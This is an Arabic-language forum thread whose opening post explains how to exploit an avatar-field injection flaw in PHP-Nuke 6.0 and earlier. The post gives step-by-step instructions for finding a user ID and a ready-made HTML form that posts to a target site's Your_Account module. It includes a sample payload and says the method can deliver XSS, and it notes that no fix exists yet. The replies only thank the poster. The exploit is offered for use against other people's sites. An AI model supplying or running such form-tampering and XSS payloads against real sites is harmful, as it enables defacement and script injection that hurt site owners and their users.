|
ثغرة في php nuke السلام عليكم و رحمة الله تعالى و بركاته [align=center]الكاتب: ياسر / الناقل : جوووووكر smilies8smilies8smilies8[/align]على العموم فقط هدا الموضوع منقول لكن لنظر اهميته حبيت اجيباكم ياه باسم الله: فيه ثغره في ال php nuke حبيت اقولكم عليها ..الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكان الصوره الشخصيه ....... انا عارف انكم اول ما تقروا السطر الاول اكيد اغلبكم حيشتمني باكثر الالفاظ اباحه - بس عادي انا متعود - و يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!! بس ؟؟؟!!! اما عبيط اوي !!! لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه ..... المهم ان الثغره كالتالي : ( ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره ) الاصدارات المصابه : PHP Nuke versionh 6.0 و الاقل منها الاستخدام : تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلال مكان صورهم الشخصيه. ملخص عام للثغره: اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلال مجموعه من الصور الموجوده في المجلد هذا /images/forum/avatars .... عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز .. و لكنها لا تقوم بوضع اي كود اي انه اذا استطاع اي يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق text عادي ..اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!! الاكسبلويت: اولا عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه Your Account و منها الذهاب الى صفحه Your Info بعد ذلك عليك باظهار سورس كود الصفحه من خلال view source و البحث عن كلمه uid لازم تلاقي حاجه زي كده : <input type="hidden" name="uid" value="2111"> كده يبقى انت عرفت رقم الاي دي اللي هوه في المثال كان 2111 ... عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد html مع ملاحظه تغيير http://nukesite/ الى عنوان المجله الهدف ......: <!-- START CODE --!> <form name="Register" action="http://NUKEDSITE/modules.php?name=Your_Account" method="post"> <b>Code ('">[code]<b ')</b><input type="text" name="user_avatar" size="30" maxlength="30"><br><br> <b>Username</b><input type="text" name="uname" size="30" maxlength="255"><br><b>User ID:<input type="text" name="uid" size="30"><input type="hidden" name="op" value="saveuser"><input type="submit" value="Save Changes"></form> <!-- END CODE --!> و الان عليك تشغيل ملف الhtml هذا .. اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب ن يبدأ بالعلامه : "> و ممكن ينتهي بالعلامه <b حتى لا تجد اي مشاكل في الكود عند العرض ...ضع بعد كده اسم اليوزر و رقم الاي دي و بعدين submit سوف تجد نفسك في صفحه Your Account الخاصه بك ..و كده الكود تم تشغيله !!!! مثال للي ممكن تكتبه مثلا : "><h1>TESTING</h1><b طبعا ده حيطبع الكلمه TESTING مكان صورتك الشخصيه ....!! خلي بالك ان فيه مسافه بعد العلامه "<b خلي بالك منها والا سوف تجد بروكين كود .. اقصى حد للكود اللي ممكن انك تشغله هو 30 كراكتر .... اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات xss او اي حاجه انت مش عارف تنفذها بسبب اغلاق كود الهتمل اياه =) لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟ الحل : لسه و الله !!!! و السلام عليكم و رحمه الله و بركاته... |
[align=center]ممممم ما فيش ردووود الاسف[/align] |
السلام عليكم بارك الله فيك يا جوكر واصل ابداعاتك و لك احلى تقييم |
شكرا لك جوكر على النقل aji akma katan9al hta fal 9issam <<<<< 3a9t bik l3az wald bladi |
[align=center]شكراااا اخي الغالي[/align] |
السلام عليكم بارك الله فيك يا جوكر |
اقتباس:
hhhhhhh b7al ila 3almak lah makayn rir ta7nach o l qit f lwadnin hhhhh smilies8smilies8smilies8 |
يعطيك العافية اخي الكريم joker-x الله يجعلها في ميزان حسناتك واضل ابداعك يا بطل و لا تحرمنا من مواضيعك الجميلة |
| الساعة الآن 04:09 PM |
[ vBspiders.Com Network ]